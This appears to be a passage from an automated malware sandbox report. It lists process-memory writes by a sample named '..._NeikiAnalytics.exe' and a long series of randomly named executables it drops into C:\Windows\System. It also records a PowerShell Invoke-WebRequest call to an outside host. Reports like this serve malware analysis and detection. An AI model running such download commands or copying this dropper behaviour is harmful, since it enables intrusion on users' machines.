PID 2220 wrote to memory of 2664 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\QPlUZvW.exe
PID 2220 wrote to memory of 2664 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\QPlUZvW.exe
PID 2220 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\xZKVtVe.exe
PID 2220 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\xZKVtVe.exe
PID 2220 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\xZKVtVe.exe
PID 2220 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\CppSwOg.exe
PID 2220 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\CppSwOg.exe
PID 2220 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\CppSwOg.exe
PID 2220 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\zbDmBlO.exe
PID 2220 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\zbDmBlO.exe
PID 2220 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\zbDmBlO.exe
PID 2220 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\QyTICoF.exe
PID 2220 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\QyTICoF.exe
PID 2220 wrote to memory of 2564 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\QyTICoF.exe
PID 2220 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\MoQhhBb.exe
PID 2220 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\MoQhhBb.exe
PID 2220 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\MoQhhBb.exe
PID 2220 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\RkyacgM.exe
PID 2220 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\RkyacgM.exe
PID 2220 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\RkyacgM.exe
PID 2220 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\CnWrEkP.exe
PID 2220 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\CnWrEkP.exe
PID 2220 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\CnWrEkP.exe
PID 2220 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\sgUhosD.exe
PID 2220 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\sgUhosD.exe
PID 2220 wrote to memory of 2152 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\sgUhosD.exe
PID 2220 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\tTOWeyA.exe
PID 2220 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\tTOWeyA.exe
PID 2220 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\tTOWeyA.exe
PID 2220 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\mIvnzGJ.exe
PID 2220 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\mIvnzGJ.exe
PID 2220 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\mIvnzGJ.exe
PID 2220 wrote to memory of 2960 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\isMtcYA.exe
PID 2220 wrote to memory of 2960 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\isMtcYA.exe
PID 2220 wrote to memory of 2960 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\isMtcYA.exe
PID 2220 wrote to memory of 1400 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\UDWXOJH.exe
PID 2220 wrote to memory of 1400 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\UDWXOJH.exe
PID 2220 wrote to memory of 1400 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\UDWXOJH.exe
PID 2220 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\CDwjHlf.exe
PID 2220 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\CDwjHlf.exe
PID 2220 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\CDwjHlf.exe
PID 2220 wrote to memory of 2148 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\TKtdLsH.exe
PID 2220 wrote to memory of 2148 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\TKtdLsH.exe
PID 2220 wrote to memory of 2148 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\TKtdLsH.exe
PID 2220 wrote to memory of 1272 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\ccQojgd.exe
PID 2220 wrote to memory of 1272 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\ccQojgd.exe
PID 2220 wrote to memory of 1272 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\ccQojgd.exe
PID 2220 wrote to memory of 1700 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\QuuhWIC.exe
PID 2220 wrote to memory of 1700 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\QuuhWIC.exe
PID 2220 wrote to memory of 1700 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\QuuhWIC.exe
PID 2220 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe C:\Windows\System\Bbxmlzd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\86ee179e2f426ab168988711a5f951e0_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\XtrSYcZ.exe

C:\Windows\System\XtrSYcZ.exe

C:\Windows\System\xTAGGOe.exe

C:\Windows\System\xTAGGOe.exe

C:\Windows\System\DBfwJRA.exe

C:\Windows\System\DBfwJRA.exe

C:\Windows\System\QPlUZvW.exe

C:\Windows\System\QPlUZvW.exe

C:\Windows\System\xZKVtVe.exe

C:\Windows\System\xZKVtVe.exe

C:\Windows\System\CppSwOg.exe

C:\Windows\System\CppSwOg.exe

C:\Windows\System\zbDmBlO.exe

C:\Windows\System\zbDmBlO.exe

C:\Windows\System\QyTICoF.exe

C:\Windows\System\QyTICoF.exe

C:\Windows\System\MoQhhBb.exe

C:\Windows\System\MoQhhBb.exe

C:\Windows\System\RkyacgM.exe

C:\Windows\System\RkyacgM.exe

C:\Windows\System\CnWrEkP.exe

C:\Windows\System\CnWrEkP.exe

C:\Windows\System\sgUhosD.exe

C:\Windows\System\sgUhosD.exe

C:\Windows\System\tTOWeyA.exe

C:\Windows\System\tTOWeyA.exe

C:\Windows\System\mIvnzGJ.exe

C:\Windows\System\mIvnzGJ.exe

C:\Windows\System\isMtcYA.exe

C:\Windows\System\isMtcYA.exe

C:\Windows\System\UDWXOJH.exe

C:\Windows\System\UDWXOJH.exe

C:\Windows\System\CDwjHlf.exe

C:\Windows\System\CDwjHlf.exe

C:\Windows\System\TKtdLsH.exe

C:\Windows\System\TKtdLsH.exe

C:\Windows\System\ccQojgd.exe

C:\Windows\System\ccQojgd.exe

C:\Windows\System\QuuhWIC.exe

C:\Windows\System\QuuhWIC.exe

C:\Windows\System\Bbxmlzd.exe

C:\Windows\System\Bbxmlzd.exe

C:\Windows\System\BJSUIuI.exe

C:\Windows\System\BJSUIuI.exe

C:\Windows\System\nTKodnR.exe

C:\Windows\System\nTKodnR.exe

C:\Windows\System\SovYnRY.exe

C:\Windows\System\SovYnRY.exe

C:\Windows\System\PQAFiiC.exe

C:\Windows\System\PQAFiiC.exe

C:\Windows\System\xMommvl.exe

C:\Windows\System\xMommvl.exe

C:\Windows\System\dXpRoLz.exe

C:\Windows\System\dXpRoLz.exe

C:\Windows\System\rbwDEvV.exe

C:\Windows\System\rbwDEvV.exe

C:\Windows\System\yPWGjbN.exe

C:\Windows\System\yPWGjbN.exe

C:\Windows\System\eBOKlaU.exe

C:\Windows\System\eBOKlaU.exe

C:\Windows\System\JwDKUOE.exe

C:\Windows\System\JwDKUOE.exe

C:\Windows\System\JioFZSG.exe

C:\Windows\System\JioFZSG.exe

C:\Windows\System\cVrwSps.exe

C:\Windows\System\cVrwSps.exe

C:\Windows\System\XiJBkAD.exe

C:\Windows\System\XiJBkAD.exe

C:\Windows\System\NuwZspg.exe

C:\Windows\System\NuwZspg.exe

C:\Windows\System\fQdAjtx.exe

C:\Windows\System\fQdAjtx.exe

C:\Windows\System\cIAZjqo.exe

C:\Windows\System\cIAZjqo.exe

C:\Windows\System\fHMuXgK.exe

C:\Windows\System\fHMuXgK.exe

C:\Windows\System\MYfdfTP.exe

C:\Windows\System\MYfdfTP.exe

C:\Windows\System\ijOCHTr.exe

C:\Windows\System\ijOCHTr.exe

C:\Windows\System\FpfcmVI.exe

C:\Windows\System\FpfcmVI.exe

C:\Windows\System\dimamJK.exe

C:\Windows\System\dimamJK.exe

C:\Windows\System\tGoGQgL.exe

C:\Windows\System\tGoGQgL.exe

C:\Windows\System\AwefXxr.exe

C:\Windows\System\AwefXxr.exe

C:\Windows\System\BvfoKgP.exe

C:\Windows\System\BvfoKgP.exe

C:\Windows\System\YKeMXPm.exe

C:\Windows\System\YKeMXPm.exe

C:\Windows\System\djoPnjl.exe

C:\Windows\System\djoPnjl.exe

C:\Windows\System\jsMlOsL.exe

C:\Windows\System\jsMlOsL.exe

C:\Windows\System\RjDMOus.exe

C:\Windows\System\RjDMOus.exe

C:\Windows\System\WuLnhjO.exe

C:\Windows\System\WuLnhjO.exe

C:\Windows\System\RibNGMc.exe

C:\Windows\System\RibNGMc.exe

C:\Windows\System\XERBGpD.exe

C:\Windows\System\XERBGpD.exe

C:\Windows\System\DTrRLBX.exe

C:\Windows\System\DTrRLBX.exe

C:\Windows\System\IifYshQ.exe

C:\Windows\System\IifYshQ.exe

C:\Windows\System\ZQGjXSH.exe

C:\Windows\System\ZQGjXSH.exe

C:\Windows\System\BuwZjux.exe

C:\Windows\System\BuwZjux.exe

C:\Windows\System\PnlPUGp.exe

C:\Windows\System\PnlPUGp.exe

C:\Windows\System\bFiAskZ.exe

C:\Windows\System\bFiAskZ.exe

C:\Windows\System\upSikDS.exe

C:\Windows\System\upSikDS.exe

C:\Windows\System\iFMrAnw.exe

C:\Windows\System\iFMrAnw.exe

C:\Windows\System\EjZKbDa.exe

C:\Windows\System\EjZKbDa.exe

C:\Windows\System\hXlvAYC.exe

C:\Windows\System\hXlvAYC.exe

C:\Windows\System\bzAIFuI.exe

C:\Windows\System\bzAIFuI.exe

C:\Windows\System\DSZlOah.exe

C:\Windows\System\DSZlOah.exe

C:\Windows\System\rNEivEM.exe

C:\Windows\System\rNEivEM.exe

C:\Windows\System\vfmnqai.exe

C:\Windows\System\vfmnqai.exe

C:\Windows\System\jpVouzW.exe

C:\Windows\System\jpVouzW.exe

C:\Windows\System\lFtblbA.exe

C:\Windows\System\lFtblbA.exe

C:\Windows\System\qRijfbq.exe

C:\Windows\System\qRijfbq.exe

C:\Windows\System\KVjaGNB.exe

C:\Windows\System\KVjaGNB.exe

C:\Windows\System\DMRPsuE.exe

C:\Windows\System\DMRPsuE.exe

C:\Windows\System\sVzuqlk.exe

C:\Windows\System\sVzuqlk.exe

C:\Windows\System\hrqJTFj.exe

C:\Windows\System\hrqJTFj.exe

C:\Windows\System\mLamBMh.exe

C:\Windows\System\mLamBMh.exe

C:\Windows\System\GHunPII.exe

C:\Windows\System\GHunPII.exe

C:\Windows\System\KQLsEnL.exe

C:\Windows\System\KQLsEnL.exe

C:\Windows\System\FmNHene.exe

C:\Windows\System\FmNHene.exe

C:\Windows\System\WNCCKgm.exe

C:\Windows\System\WNCCKgm.exe

C:\Windows\System\FRGzcza.exe

C:\Windows\System\FRGzcza.exe

C:\Windows\System\vwgOigg.exe

C:\Windows\System\vwgOigg.exe

C:\Windows\System\NZvMewn.exe

C:\Windows\System\NZvMewn.exe

C:\Windows\System\iKclctw.exe

C:\Windows\System\iKclctw.exe

C:\Windows\System\iidXGPT.exe

C:\Windows\System\iidXGPT.exe

C:\Windows\System\ODxbgir.exe

C:\Windows\System\ODxbgir.exe

C:\Windows\System\NOavXuy.exe

C:\Windows\System\NOavXuy.exe

C:\Windows\System\MJSKBkS.exe

C:\Windows\System\MJSKBkS.exe

C:\Windows\System\favOtly.exe

C:\Windows\System\favOtly.exe

C:\Windows\System\HuBSDAx.exe

C:\Windows\System\HuBSDAx.exe

C:\Windows\System\UlJgAHY.exe

C:\Windows\System\UlJgAHY.exe

C:\Windows\System\gQyfQiJ.exe

C:\Windows\System\gQyfQiJ.exe

C:\Windows\System\jDkaxRX.exe

C:\Windows\System\jDkaxRX.exe

C:\Windows\System\qQNwpCc.exe

C:\Windows\System\qQNwpCc.exe

C:\Windows\System\jNizAWp.exe

C:\Windows\System\jNizAWp.exe

C:\Windows\System\mgrQFIH.exe

C:\Windows\System\mgrQFIH.exe

C:\Windows\System\viyKskY.exe

C:\Windows\System\viyKskY.exe

C:\Windows\System\SgevNOP.exe

C:\Windows\System\SgevNOP.exe

C:\Windows\System\RGVkjmT.exe

C:\Windows\System\RGVkjmT.exe

C:\Windows\System\LbsPEZN.exe

C:\Windows\System\LbsPEZN.exe

C:\Windows\System\kzOzMGM.exe

C:\Windows\System\kzOzMGM.exe

C:\Windows\System\dKxwyGn.exe

C:\Windows\System\dKxwyGn.exe

C:\Windows\System\GsUDCII.exe

C:\Windows\System\GsUDCII.exe

C:\Windows\System\wmTmPgQ.exe

C:\Windows\System\wmTmPgQ.exe

C:\Windows\System\joLfuPR.exe

C:\Windows\System\joLfuPR.exe

C:\Windows\System\cnraqaA.exe

C:\Windows\System\cnraqaA.exe

C:\Windows\System\FWTDsYn.exe

C:\Windows\System\FWTDsYn.exe

C:\Windows\System\rgQeFpr.exe

C:\Windows\System\rgQeFpr.exe

C:\Windows\System\xtrpoDt.exe

C:\Windows\System\xtrpoDt.exe

C:\Windows\System\SmzsMzn.exe

C:\Windows\System\SmzsMzn.exe

C:\Windows\System\ITyWxzn.exe

C:\Windows\System\ITyWxzn.exe

C:\Windows\System\blXyyML.exe

C:\Windows\System\blXyyML.exe

C:\Windows\System\lRWCprF.exe

C:\Windows\System\lRWCprF.exe

C:\Windows\System\aXMvPPb.exe

C:\Windows\System\aXMvPPb.exe

C:\Windows\System\qUxObHA.exe

C:\Windows\System\qUxObHA.exe

C:\Windows\System\jCgVReV.exe

C:\Windows\System\jCgVReV.exe

C:\Windows\System\hxBhwxE.exe

C:\Windows\System\hxBhwxE.exe

C:\Windows\System\upQwDIR.exe

C:\Windows\System\upQwDIR.exe

C:\Windows\System\MlHCWEM.exe

C:\Windows\System\MlHCWEM.exe

C:\Windows\System\ZbOGQAP.exe

C:\Windows\System\ZbOGQAP.exe

C:\Windows\System\FWZrLnT.exe

C:\Windows\System\FWZrLnT.exe

C:\Windows\System\YRuFOjb.exe

C:\Windows\System\YRuFOjb.exe

C:\Windows\System\YKEUnxO.exe

C:\Windows\System\YKEUnxO.exe

C:\Windows\System\uYroUDl.exe

C:\Windows\System\uYroUDl.exe

C:\Windows\System\skfCGtq.exe

C:\Windows\System\skfCGtq.exe

C:\Windows\System\dMvrSBt.exe

C:\Windows\System\dMvrSBt.exe

C:\Windows\System\PjCQqpo.exe

C:\Windows\System\PjCQqpo.exe

C:\Windows\System\pMbEddc.exe

C:\Windows\System\pMbEddc.exe

C:\Windows\System\emfoWZM.exe

C:\Windows\System\emfoWZM.exe

C:\Windows\System\tkmmnOO.exe

C:\Windows\System\tkmmnOO.exe

C:\Windows\System\WKVvzvf.exe

C:\Windows\System\WKVvzvf.exe

C:\Windows\System\XJeWlFJ.exe

C:\Windows\System\XJeWlFJ.exe

C:\Windows\System\MIIkleI.exe

C:\Windows\System\MIIkleI.exe

C:\Windows\System\QzIwtJL.exe

C:\Windows\System\QzIwtJL.exe

C:\Windows\System\MIUxcVi.exe

C:\Windows\System\MIUxcVi.exe

C:\Windows\System\YEqLkOj.exe

C:\Windows\System\YEqLkOj.exe

C:\Windows\System\ZScYTuZ.exe

C:\Windows\System\ZScYTuZ.exe

C:\Windows\System\FqOHsyX.exe

C:\Windows\System\FqOHsyX.exe

C:\Windows\System\IixLRrY.exe

C:\Windows\System\IixLRrY.exe

C:\Windows\System\UMEetkO.exe

C:\Windows\System\UMEetkO.exe

C:\Windows\System\LUAKVfV.exe

C:\Windows\System\LUAKVfV.exe

C:\Windows\System\sLSUlMy.exe

C:\Windows\System\sLSUlMy.exe

C:\Windows\System\XvlLwdg.exe

C:\Windows\System\XvlLwdg.exe

C:\Windows\System\AqIXWbJ.exe

C:\Windows\System\AqIXWbJ.exe

C:\Windows\System\mPcbHAy.exe

C:\Windows\System\mPcbHAy.exe

C:\Windows\System\SyrwtEE.exe

C:\Windows\System\SyrwtEE.exe

C:\Windows\System\cipKpuM.exe

C:\Windows\System\cipKpuM.exe

C:\Windows\System\JPCVDaN.exe

C:\Windows\System\JPCVDaN.exe

C:\Windows\System\lqPAUGA.exe

C:\Windows\System\lqPAUGA.exe

C:\Windows\System\LkIrXeW.exe

C:\Windows\System\LkIrXeW.exe

C:\Windows\System\GvtAPJH.exe

C:\Windows\System\GvtAPJH.exe

C:\Windows\System\WGVsgdW.exe

C:\Windows\System\WGVsgdW.exe

C:\Windows\System\yCIWlBZ.exe

C:\Windows\System\yCIWlBZ.exe

C:\Windows\System\MnMOmXi.exe

C:\Windows\System\MnMOmXi.exe

C:\Windows\System\gmVvExr.exe

C:\Windows\System\gmVvExr.exe

C:\Windows\System\fWWDSdp.exe

C:\Windows\System\fWWDSdp.exe

C:\Windows\System\dRUBZLP.exe

C:\Windows\System\dRUBZLP.exe

C:\Windows\System\YChjTYM.exe

C:\Windows\System\YChjTYM.exe

C:\Windows\System\ghwWHyt.exe

C:\Windows\System\ghwWHyt.exe

C:\Windows\System\JDfTTAA.exe

C:\Windows\System\JDfTTAA.exe

C:\Windows\System\QNQHgJp.exe

C:\Windows\System\QNQHgJp.exe

C:\Windows\System\dtqAkGI.exe

C:\Windows\System\dtqAkGI.exe

C:\Windows\System\VOmGROA.exe

C:\Windows\System\VOmGROA.exe

C:\Windows\System\JidcCWm.exe

C:\Windows\System\JidcCWm.exe

C:\Windows\System\HbWMuPY.exe

C:\Windows\System\HbWMuPY.exe

C:\Windows\System\NIcMEmD.exe

C:\Windows\System\NIcMEmD.exe

C:\Windows\System\IipxYSA.exe

C:\Windows\System\IipxYSA.exe

C:\Windows\System\MOlUguv.exe

C:\Windows\System\MOlUguv.exe

C:\Windows\System\ZPDHGms.exe

C:\Windows\System\ZPDHGms.exe

C:\Windows\System\zByZvFh.exe

C:\Windows\System\zByZvFh.exe

C:\Windows\System\LLjDylb.exe

C:\Windows\System\LLjDylb.exe

C:\Windows\System\ZEAdKqn.exe

C:\Windows\System\ZEAdKqn.exe

C:\Windows\System\DVAgUOt.exe

C:\Windows\System\DVAgUOt.exe

C:\Windows\System\rAPvJjw.exe

C:\Windows\System\rAPvJjw.exe

C:\Windows\System\sJfsfzr.exe

C:\Windows\System\sJfsfzr.exe

C:\Windows\System\VtPdSOU.exe

C:\Windows\System\VtPdSOU.exe

C:\Windows\System\LvACTZB.exe

C:\Windows\System\LvACTZB.exe

C:\Windows\System\VsqBPWT.exe

C:\Windows\System\VsqBPWT.exe

C:\Windows\System\einJFCG.exe

C:\Windows\System\einJFCG.exe

C:\Windows\System\JFqynCY.exe

C:\Windows\System\JFqynCY.exe

C:\Windows\System\quUAJCE.exe

C:\Windows\System\quUAJCE.exe

C:\Windows\System\AaSkoMx.exe

C:\Windows\System\AaSkoMx.exe

C:\Windows\System\FFMygcU.exe

C:\Windows\System\FFMygcU.exe

C:\Windows\System\xvpRpeU.exe

C:\Windows\System\xvpRpeU.exe

C:\Windows\System\rfLJAul.exe

C:\Windows\System\rfLJAul.exe

C:\Windows\System\vrzzxEW.exe

C:\Windows\System\vrzzxEW.exe

C:\Windows\System\XFmqPKE.exe

C:\Windows\System\XFmqPKE.exe

C:\Windows\System\OdVoDvZ.exe

C:\Windows\System\OdVoDvZ.exe

C:\Windows\System\ylKNfvy.exe

C:\Windows\System\ylKNfvy.exe

C:\Windows\System\qYtcwCx.exe

C:\Windows\System\qYtcwCx.exe

C:\Windows\System\vcQCcmi.exe

C:\Windows\System\vcQCcmi.exe

C:\Windows\System\nRphmUI.exe

C:\Windows\System\nRphmUI.exe

C:\Windows\System\gdehNnm.exe

C:\Windows\System\gdehNnm.exe

C:\Windows\System\bEArvmS.exe

C:\Windows\System\bEArvmS.exe

C:\Windows\System\LmaVzvV.exe

C:\Windows\System\LmaVzvV.exe

C:\Windows\System\rdkVuJr.exe

C:\Windows\System\rdkVuJr.exe

C:\Windows\System\FsYfHVF.exe

C:\Windows\System\FsYfHVF.exe

C:\Windows\System\uJwpCFg.exe

C:\Windows\System\uJwpCFg.exe

C:\Windows\System\uFMiXDJ.exe

C:\Windows\System\uFMiXDJ.exe

C:\Windows\System\icnBnZb.exe

C:\Windows\System\icnBnZb.exe

C:\Windows\System\mDuWKzP.exe

C:\Windows\System\mDuWKzP.exe

C:\Windows\System\uNxTtjF.exe

C:\Windows\System\uNxTtjF.exe

C:\Windows\System\mhrJAeT.exe

C:\Windows\System\mhrJAeT.exe

C:\Windows\System\zgnMflv.exe

C:\Windows\System\zgnMflv.exe

C:\Windows\System\xATQJCu.exe

C:\Windows\System\xATQJCu.exe

C:\Windows\System\YjUVvsp.exe

C:\Windows\System\YjUVvsp.exe

C:\Windows\System\kSebtya.exe

C:\Windows\System\kSebtya.exe

C:\Windows\System\JMiRflp.exe

C:\Windows\System\JMiRflp.exe

C:\Windows\System\BAdPMHr.exe

C:\Windows\System\BAdPMHr.exe

C:\Windows\System\JSvKSTb.exe

C:\Windows\System\JSvKSTb.exe

C:\Windows\System\NgzSlGC.exe

C:\Windows\System\NgzSlGC.exe

C:\Windows\System\pTlPNQG.exe

C:\Windows\System\pTlPNQG.exe

C:\Windows\System\lEHVMFG.exe

C:\Windows\System\lEHVMFG.exe

C:\Windows\System\aBmQaTa.exe

C:\Windows\System\aBmQaTa.exe

C:\Windows\System\ojVUiYD.exe

C:\Windows\System\ojVUiYD.exe

C:\Windows\System\LfTgTbb.exe

C:\Windows\System\LfTgTbb.exe

C:\Windows\System\gNPGWfG.exe

C:\Windows\System\gNPGWfG.exe

C:\Windows\System\paFqnOy.exe

C:\Windows\System\paFqnOy.exe

C:\Windows\System\bfxYYRU.exe

C:\Windows\System\bfxYYRU.exe

C:\Windows\System\DWwWuks.exe

C:\Windows\System\DWwWuks.exe

C:\Windows\System\UtSIbee.exe

C:\Windows\System\UtSIbee.exe

C:\Windows\System\MYNWSUj.exe

C:\Windows\System\MYNWSUj.exe

C:\Windows\System\GALpsaF.exe

C:\Windows\System\GALpsaF.exe

C:\Windows\System\nGrLgaH.exe

C:\Windows\System\nGrLgaH.exe

C:\Windows\System\bYnlgvI.exe

C:\Windows\System\bYnlgvI.exe

C:\Windows\System\Iwzwdyp.exe

C:\Windows\System\Iwzwdyp.exe

C:\Windows\System\QnOYfbK.exe

C:\Windows\System\QnOYfbK.exe

C:\Windows\System\vbrFWAS.exe

C:\Windows\System\vbrFWAS.exe

C:\Windows\System\qMTtDsr.exe

C:\Windows\System\qMTtDsr.exe

C:\Windows\System\suPCIPx.exe

C:\Windows\System\suPCIPx.exe

C:\Windows\System\HeTxdRP.exe

C:\Windows\System\HeTxdRP.exe

C:\Windows\System\WmmjJPI.exe

C:\Windows\System\WmmjJPI.exe

C:\Windows\System\JbXkKGd.exe

C:\Windows\System\JbXkKGd.exe

C:\Windows\System\bqbKwQp.exe

C:\Windows\System\bqbKwQp.exe

C:\Windows\System\UoTwNgs.exe

C:\Windows\System\UoTwNgs.exe

C:\Windows\System\YHuvNmY.exe

C:\Windows\System\YHuvNmY.exe

C:\Windows\System\lguatuq.exe

C:\Windows\System\lguatuq.exe

C:\Windows\System\emPrvCi.exe

C:\Windows\System\emPrvCi.exe

C:\Windows\System\gdSAjja.exe

C:\Windows\System\gdSAjja.exe

C:\Windows\System\BsXFrDX.exe

C:\Windows\System\BsXFrDX.exe

C:\Windows\System\IQBfmNw.exe

C:\Windows\System\IQBfmNw.exe

C:\Windows\System\ZDquCKO.exe

C:\Windows\System\ZDquCKO.exe

C:\Windows\System\UMwlDLl.exe

C:\Windows\System\UMwlDLl.exe

C:\Windows\System\fheSAFT.exe

C:\Windows\System\fheSAFT.exe

C:\Windows\System\cmpadDv.exe

C:\Windows\System\cmpadDv.exe

C:\Windows\System\ZXYpBbG.exe

C:\Windows\System\ZXYpBbG.exe

C:\Windows\System\PwzRVvY.exe

C:\Windows\System\PwzRVvY.exe

C:\Windows\System\fNgROZi.exe

C:\Windows\System\fNgROZi.exe

C:\Windows\System\UJhddPM.exe

C:\Windows\System\UJhddPM.exe

C:\Windows\System\DfpBVtQ.exe

C:\Windows\System\DfpBVtQ.exe

C:\Windows\System\xcfqHmU.exe

C:\Windows\System\xcfqHmU.exe

C:\Windows\System\uQhmYCI.exe

C:\Windows\System\uQhmYCI.exe

C:\Windows\System\hsvXHuN.exe

C:\Windows\System\hsvXHuN.exe

C:\Windows\System\SgrSbZK.exe

C:\Windows\System\SgrSbZK.exe

C:\Windows\System\nwUGdID.exe

C:\Windows\System\nwUGdID.exe

C:\Windows\System\oKzroSm.exe

C:\Windows\System\oKzroSm.exe

C:\Windows\System\kzUgkmq.exe

C:\Windows\System\kzUgkmq.exe

C:\Windows\System\aCQSZmL.exe

C:\Windows\System\aCQSZmL.exe

C:\Windows\System\jbvgbOg.exe

